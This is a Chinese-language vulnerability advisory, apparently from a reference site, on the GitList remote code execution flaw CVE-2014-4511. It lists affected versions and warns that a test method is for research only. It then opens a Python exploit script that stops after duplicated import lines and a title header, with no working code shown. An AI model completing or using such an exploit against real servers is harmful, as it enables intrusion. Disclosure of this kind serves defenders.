GitList远程代码执行漏洞(CVE-2014-4511)
发布时间:2016-01-30 来源:查字典编辑
摘要:受影响系统:GitListGitList
受影响系统:
GitList GitList < 0.4.0
GitList GitList
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 68253
CVE(CAN) ID: CVE-2014-4511
GitList是用PHP编写的开源软件,是git库浏览器。
GitList 0.4.0之前版本在实现上存在远程代码执行漏洞,远程攻击者可利用此漏洞执行任意代码。
测试方法: --------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
复制代码代码如下:
from commands import getoutput
import urllib
import sys
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist